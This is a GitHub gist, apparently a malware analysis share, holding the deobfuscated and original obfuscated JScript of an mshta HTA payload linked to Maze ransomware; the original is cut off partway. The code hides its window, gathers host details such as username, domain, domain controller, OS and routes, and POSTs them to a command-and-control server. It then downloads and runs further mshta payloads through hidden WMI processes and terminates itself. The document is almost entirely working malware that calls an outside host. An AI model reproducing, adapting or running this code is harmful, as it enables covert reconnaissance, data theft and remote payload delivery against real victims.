Skip to content

Instantly share code, notes, and snippets.

@Kristal-g

Kristal-g/maze_online_mshta_payload_deobfuscated.hta.js Secret

Last active Aug 13, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
maze_online_mshta_payload_deobfuscated.hta.js
window.moveTo(-105, 300);
window.blur();
window.resizeTo(10, 15);
try {
window.onerror = function(sMsg, sUrl, sLine) {
return false;
}
window.onfocus = function() {
window.blur();
}
} catch (e) {}
var mainFuncStruct = {};
function reverseString(s) {
return s.split("").reverse().join("");
}
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject");
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell");
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st";
mainFuncStruct.maybeToken = "REDACTED";
mainFuncStruct.emptyIfFirstRun = "";
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";
mainFuncStruct.highNumber = "999999999999999";
mainFuncStruct.callbackAfterTimeout = function(ms, callback) {
if (mainFuncStruct.isRunningInMshta()) {
window.setTimeout(callback, ms);
} else {
var now = new Date().getTime();
while (new Date().getTime() < now + ms);
callback();
}
}
mainFuncStruct.killSelf = function() {
if (mainFuncStruct.isRunningInMshta()) {
try {
window["close"]();
} catch (e) {}
try {
window.self["close"]();
} catch (e) {}
try {
window.top["close"]();
} catch (e) {}
try {
self["close"]();
} catch (e) {}
try {
window.open('', '_self', '');
window["close"]();
} catch (e) {}
}
try {
WScript.quit();
} catch (e) {}
try {
var pid = mainFuncStruct.funcStruct1.getOwnPID();
mainFuncStruct.funcStruct1.terminateProcessByPID(pid);
} catch (e) {}
}
mainFuncStruct.isRunningInMshta = function() {
return typeof(window) !== "undefined";
}
mainFuncStruct.checkIfWscriptDefined = function() {
return typeof(WScript) !== "undefined";
}
mainFuncStruct.maybeGenGUID = function() {
try {
function s4() {
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1);
}
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' +
s4() + '-' + s4() + s4() + s4();
} catch (e) {}
}
mainFuncStruct.funcStruct4 = {};
mainFuncStruct.funcStruct4.getSessions = function() {
try {
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
if (res.indexOf("ofailur") == -1) {
return true;
}
return false;
} catch (e) {
return false;
}
}
mainFuncStruct.funcStruct4.readOsVersion = function() {
try {
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");
return osver + "triplestar" + osbuild;
} catch (e) {}
return "Unknown";
}
mainFuncStruct.funcStruct4.getDCName = function() {
try {
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");
if (DC.length > 0) {
return DC;
}
} catch (e) {}
return "Unknown";
}
mainFuncStruct.funcStruct4.getArch = function() {
try {
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");
return arch;
} catch (e) {}
return "Unknown";
}
mainFuncStruct.funcStruct4.cdToTempFolder = function() {
try {
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp");
return truew;
} catch (e) {}
return "";
}
mainFuncStruct.funcStruct4.getRoutingInfo = function() {
try {
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
var res = routeprint4.split("\r\n");
for (var i = 0; i < res.length; i++) {
line = res[i].split(" ");
zerocount = 0;
itemcount = 0;
correctflag = false;
for (var j = 0; j < line.length; j++) {
if (line[j]) {
itemcount += 1;
if (itemcount == 4 && correctflag) {
return line[j];
}
}
if (line[j] == "0.0.0.0") {
zerocount += 1;
if (zerocount == 2) {
correctflag = true;
}
}
}
}
} catch (e) {}
return "";
}
mainFuncStruct.funcStruct4.getComputerInfo = function() {
var net = new ActiveXObject("WScript.Network");
var domain = "";
if (net.UserDomain.length != 0) {
domain = net.UserDomain;
} else {
try {
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log");
} catch (h) {} finally {
domain = domain.split(" \r\n")[0];
}
}
var info = domain + "\\" + net.Username;
if (mainFuncStruct.funcStruct4.getSessions())
info += "*";
info += " n0body i know " + net.ComputerName;
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion();
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName();
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch();
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder();
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo();
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp();
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum();
return info;
}
mainFuncStruct.funcStruct4.chcp = function() {
try {
return "1252"
} catch (e) {
return "1252";
}
}
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() {
try {
return "1252"
} catch (e) {
return "437";
}
}
mainFuncStruct.funcStruct6 = {};
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) {
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers);
}
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) {
try {
var headers = {};
headers["errno"] = (e.number) ? e.number : "-1";
headers["errname"] = (e.name) ? e.name : "Unknown";
headers["errdesc"] = (e.description) ? e.description : "Unknown";
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers);
} catch (e) {}
}
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) {
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun;
return mainFuncStruct.someCNCUrl + jobkey + "&";
}
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() {
var url = mainFuncStruct.funcStruct6.getCncWithJobURL();
return mainFuncStruct.funcStruct7.sendHTTPRequest(url);
}
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) {
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false;
var cmd = "mshta stelsy";
if (fork32Bit)
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd;
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey));
try {
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd);
} catch (e) {
mainFuncStruct.shellObj.Run(cmd, 0, false);
}
}
mainFuncStruct.funcStruct7 = {};
mainFuncStruct.funcStruct7.getHttpRequestObj = function() {
var http = null;
try {
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0");
http.setTimeouts(~~[], ~~[], ~~[], ~~[]);
} catch (e) {
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1");
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]);
}
return http;
}
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) {
var headers = (typeof(headers) !== "undefined") ? headers : {};
var content = false;
for (var key in headers) {
try {
var value = headers[key];
http.setRequestHeader(key, value);
} catch (h) {} finally {
if (key.toUpperCase() == "CONTENT-TYPE")
content = true;
}
}
if (!content)
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json");
}
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) {
var data = (typeof(data) !== "undefined") ? data : "";
var http = mainFuncStruct.funcStruct7.getHttpRequestObj();
http.open("POST", url, false);
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers);
http.send(data);
return http;
}
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) {
var http = mainFuncStruct.funcStruct7.getHttpRequestObj();
http["op" + "en"]("GET", url, false);
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers);
http["se" + "nd"]();
return http;
}
mainFuncStruct.funcStruct1 = {};
mainFuncStruct.funcStruct1.getOwnPID = function() {
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname");
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd);
var pid = -1;
var latestTime = 0;
var latestProc = null;
var processes = mainFuncStruct.funcStruct1.getProcessList();
var items = new Enumerator(processes);
while (!items.atEnd()) {
var proc = items.item();
try {
if (proc.ProcessId == childPid) {
latestProc = proc;
break;
}
} catch (e) {}
items.moveNext();
}
pid = latestProc.ParentProcessId;
latestProc.Terminate();
return pid;
}
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) {
var processes = mainFuncStruct.funcStruct1.getProcessList();
var items = new Enumerator(processes);
while (!items.atEnd()) {
var proc = items.item();
try {
if (proc.ProcessId == pid) {
proc.Terminate();
return true;
}
} catch (e) {}
items.moveNext();
}
return false;
}
mainFuncStruct.funcStruct1.getProcessList = function() {
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var query = "Select * From Win32_Process";
return wmi.ExecQuery(query);
}
mainFuncStruct.funcStruct5 = {};
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000;
mainFuncStruct.funcStruct5.HKCU = 0x80000001;
mainFuncStruct.funcStruct5.HKLM = 0x80000002;
mainFuncStruct.funcStruct5.REG_STRING = 0;
mainFuncStruct.funcStruct5.REG_BINARY = 1;
mainFuncStruct.funcStruct5.REG_DWORD = 2;
mainFuncStruct.funcStruct5.REG_QWORD = 3;
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) {
var computer = (typeof(computer) !== "undefined") ? computer : ".";
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv");
return reg;
}
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) {
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer);
reg.CreateKey(hKey, path);
if (valType == mainFuncStruct.funcStruct5.REG_STRING)
reg.SetStringValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD)
reg.SetDWORDValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD)
reg.SetQWORDValue(hKey, path, key, value);
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY)
reg.SetBinaryValue(hKey, path, key, value);
}
mainFuncStruct.funcStruct6 = {};
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) {
var SW_HIDE = 0;
var pid = 0;
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
si.ShowWindow = SW_HIDE;
si.CreateFlags = 16777216;
si.X = si.Y = si.XSize = si.ySize = 1;
var w32proc = wmi.Get("Win32_Process");
var method = w32proc.Methods_.Item("Create");
var inParams = method.InParameters.SpawnInstance_();
inParams.CommandLine = cmd;
inParams.CurrentDirectory = null;
inParams.ProcessStartupInformation = si;
var outParams = w32proc.ExecMethod_("Create", inParams);
return outParams.ProcessId;
}
mainFuncStruct.funcStruct3 = {};
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) {
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd;
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath);
c += " 2>&1";
mainFuncStruct.shellObj.Run(c, 0, true);
if (mainFuncStruct.funcStruct4.chcp() == "936") {
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath);
} else {
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath);
}
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath);
return data;
}
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) {
var fork = (typeof(fork) !== "undefined") ? fork : true;
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd;
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork);
}
mainFuncStruct.funcStruct2 = {};
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) {
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path);
}
mainFuncStruct.funcStruct2.getSystemFolder = function() {
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%");
var syswow64 = base + "\\SysWOW64\\";
if (mainFuncStruct.fileObj.FolderExists(syswow64))
return syswow64;
return base + "\\System32\\";
}
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) {
var loopcount = 0;
while (true) {
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) {
try {
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0);
var data = fd.ReadAll();
fd.Close();
return data;
} catch (e) {
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
continue;
}
} else {
loopcount += 1;
if (loopcount > 180) {
return "";
}
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
}
}
}
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) {
var exists = (typeof(exists) !== "undefined") ? exists : false;
var certutil = (typeof(certutil) !== "undefined") ? certutil : false;
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) {
var headers = {};
headers["Sta" + "tus"] = "Not" + "Exist";
mainFuncStruct.funcStruct6.sendDataToCNC("", headers);
return "";
}
var loopcount = 0;
while (true) {
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) {
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) {
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og";
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout);
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout);
mainFuncStruct.funcStruct2.shellDeleteFile(newout);
} else {
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path));
var fd = fp.OpenAsTextStream();
var data = fd.read(fp.Size);
fd.close();
}
return data;
} else {
loopcount += 1;
if (loopcount > 180) {
return "";
}
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false);
}
}
}
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) {
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true);
};
try {
if (mainFuncStruct.emptyIfFirstRun != "prfx") {
if (mainFuncStruct.isRunningInMshta()) {
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles";
var key = "Ma" + "xScriptStat" + "ements";
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD);
}
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo());
try {
mainFuncStruct.funcStruct6.runMshtaFromCNC("");
} catch (e) {
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e)
}
mainFuncStruct.killSelf();
} else {
if (mainFuncStruct.isRunningInMshta())
LimitedRunLoop();
else
InfiniteRunLoop();
}
} catch (e) {
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e);
}
function CanHelp() {
var epoch = new Date().getTime();
var expire = parseInt(mainFuncStruct.highNumber);
if (epoch > expire) {
return 0;
}
try {
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty();
if (work.status == 201 || work.status == 202 || work.status == 200) {
if (work.responseText.length > 0) {
var jobkey = work.responseText;
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202);
}
} else {
return 0;
}
} catch (e) {
return 0;
}
return 1;
}
function InfiniteRunLoop() {
var an = "undefined";
while (CanHelp());
mainFuncStruct.killSelf();
}
function LimitedRunLoop() {
var sn = "undefined";
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) {
if (!CanHelp()) {
mainFuncStruct.killSelf();
return;
}
}
if (sn == "undefined") {
mainFuncStruct.funcStruct6.runMshtaFromCNC("");
mainFuncStruct.killSelf();
}
}
Raw
maze_online_mshta_payload_original.hta.html
<html>
<head>
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" />
<script language="JScript">
window.moveTo(-105,300);window.blur();window.resizeTo(10,15);try
{window.onerror=function(sMsg,sUrl,sLine){return false;}
window.onfocus=function(){window.blur();}}
catch(e){}
var USZOOYWIZS={};function rsS(s){return s.split("").reverse().join("");}
USZOOYWIZS.BZIYSEPGNF=new ActiveXObject("Scrip"+rsS("bOmetsySeliF.gnit")+"ject");USZOOYWIZS.VYAUWFCEQB=new ActiveXObject("WScrip"+"t.S"+rsS("lleh"));USZOOYWIZS.PALBTPZSUF="http://crt.officecloud.top/st";USZOOYWIZS.BZZUUCGDQU="REDACTED";USZOOYWIZS.TNHTOGCTIG="";USZOOYWIZS.JPOWZJFUNB="http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";USZOOYWIZS.HIJJAGKENR="999999999999999";USZOOYWIZS.GGIAVPXSTH=function(ms,callback)
{if(USZOOYWIZS.DYPJQVFPFC())
{window.setTimeout(callback,ms);}
else
{var now=new Date().getTime();while(new Date().getTime()<now+ms);callback();}}
USZOOYWIZS.IQSPUIAMOB=function()
{if(USZOOYWIZS.DYPJQVFPFC())
{try{window["close"]();}catch(e){}
try{window.self["close"]();}catch(e){}
try{window.top["close"]();}catch(e){}
try{self["close"]();}catch(e){}
try
{window.open('','_self','');window["close"]();}
catch(e)
{}}
try
{WScript.quit();}
catch(e)
{}
try
{var pid=USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG();USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC(pid);}
catch(e)
{}}
USZOOYWIZS.DYPJQVFPFC=function()
{return typeof(window)!==rsS("denifednu");}
USZOOYWIZS.XTERINGOBR=function()
{return typeof(WScript)!==rsS("denifednu");}
USZOOYWIZS.SFULCEKQPJ=function()
{try
{function s4()
{return Math.floor((1+Math.random())*0x1235612).toString(16).substring(1);}
return s4()+s4()+'-'+s4()+s4()+'-'+s4()+'-'+
s4()+'-'+s4()+s4()+s4();}
catch(e)
{}}
USZOOYWIZS.FSZGCSETMH={};USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ=function()
{try
{var res=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("(net1 session || echo ofailur)","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");if(res.indexOf("ofailur")==-1)
{return true;}
return false;}
catch(e)
{return false;}}
USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP=function()
{try
{var osver=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"triplestar"+osbuild;}
catch(e){}
return"Unknown";}
USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU=function()
{try
{var DC=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
{return DC;}}
catch(e)
{}
return"Unknown";}
USZOOYWIZS.FSZGCSETMH.GTTECATTBE=function()
{try
{var arch=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
catch(e){}
return"Unknown";}
USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU=function()
{try
{var truew=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("cd","%TEMP%\\truew.tmp");return truew;}
catch(e)
{}
return"";}
USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC=function()
{try
{var routeprint4=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("route PRINT -4","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
{line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
{if(line[j])
{itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
if(line[j]=="0.0.0.0")
{zerocount+=1;if(zerocount==2)
{correctflag=true;}}}}}
catch(e)
{}
return"";}
USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA=function()
{var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
{domain=net.UserDomain;}
else
{try{domain=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("echo %userdomain%","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");}catch(h){}finally{domain=domain.split(" \r\n")[0];}}
var info=domain+"\\"+net.Username;if(USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ())
info+="*";info+=" n0body i know "+net.ComputerName;info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.GTTECATTBE();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE();return info;}
USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM=function()
{try
{return"1252"}
catch(e)
{return"1252";}}
USZOOYWIZS.FSZGCSETMH.RLUXESGUDE=function()
{try
{return"1252"}
catch(e)
{return"437";}}
USZOOYWIZS.JLOOXOZDZT={};USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK=function(data,headers)
{return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(),data,headers);}
USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH=function(e)
{try
{var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(e.message,headers);}
catch(e)
{}}
USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO=function(jobkey)
{var jobkey=(typeof(jobkey)!=="undefined")?jobkey:USZOOYWIZS.TNHTOGCTIG;return USZOOYWIZS.JPOWZJFUNB+jobkey+"&";}
USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE=function()
{var url=USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO();return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(url);}
USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX=function(jobkey,fork32Bit)
{var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="mshta stelsy";if(fork32Bit)
cmd=USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ()+cmd;cmd=cmd.replace("stelsy",USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(jobkey));try{USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);}catch(e){USZOOYWIZS.VYAUWFCEQB.Run(cmd,0,false);}}
USZOOYWIZS.KTFJHNZIRI={};USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ=function()
{var http=null;try
{http=new ActiveXObject(rsS("HLMXrevreS.2lmxsM")+"TTP.6.0");http.setTimeouts(~~[],~~[],~~[],~~[]);}
catch(e)
{http=new ActiveXObject(rsS("eRpttHniW.pttHniW")+"quest.5.1");http.setTimeouts(0x7530,0x7530,0x7530,~~[]);}
return http;}
USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD=function(http,headers)
{var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
{try{var value=headers[key];http.setRequestHeader(key,value);}catch(h){}finally{if(key.toUpperCase()=="CONTENT-TYPE")
content=true;}}
if(!content)
http[rsS("Rtes")+"eque"+rsS("Hts")+"eader"]("Content-Type","application/json");}
USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS=function(url,data,headers)
{var data=(typeof(data)!=="undefined")?data:"";var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http.open("POST",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http.send(data);return http;}
USZOOYWIZS.KTFJHNZIRI.KEYOMPGODE=function(url,headers)
{var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http[rsS("po")+"en"]("GET",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http[rsS("es")+"nd"]();return http;}
USZOOYWIZS.ERDXQCZMRN={};USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG=function()
{var cmd=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%comspec% /K hostname");var childPid=USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);var pid=-1;var latestTime=0;var latestProc=null;var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd())
{var proc=items.item();try
{if(proc.ProcessId==childPid)
{latestProc=proc;break;}}catch(e)
{}
items.moveNext();}
pid=latestProc.ParentProcessId;latestProc.Terminate();return pid;}
USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC=function(pid)
{var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd())
{var proc=items.item();try
{if(proc.ProcessId==pid)
{proc.Terminate();return true;}}catch(e)
{}
items.moveNext();}
return false;}
USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN=function()
{var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");var query="Select * From Win32_Process";return wmi.ExecQuery(query);}
USZOOYWIZS.XDGAVBPIRF={};USZOOYWIZS.XDGAVBPIRF.ZNGQDUNJPL=0x80000000;USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI=0x80000001;USZOOYWIZS.XDGAVBPIRF.JLKBWUKRUQ=0x80000002;USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII=0;USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK=1;USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM=2;USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG=3;USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM=function(computer)
{var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR=function(hKey,path,key,value,valType,computer)
{var reg=USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM(computer);reg.CreateKey(hKey,path);if(valType==USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII)
reg.SetStringValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM)
reg.SetDWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG)
reg.SetQWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK)
reg.SetBinaryValue(hKey,path,key,value);}
USZOOYWIZS.CMXWOMTDOO={};USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME=function(cmd)
{var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
USZOOYWIZS.PUZLNFITWY={};USZOOYWIZS.PUZLNFITWY.GXJDCREARQ=function(cmd,stdOutPath)
{cmd="chcp "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE()+" & "+cmd;var c="cmd /c %c^oms^pec%^ /q /c "+cmd+" 1> "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(stdOutPath);c+=" 2>&1";USZOOYWIZS.VYAUWFCEQB.Run(c,0,true);if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936")
{var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(stdOutPath);}
else
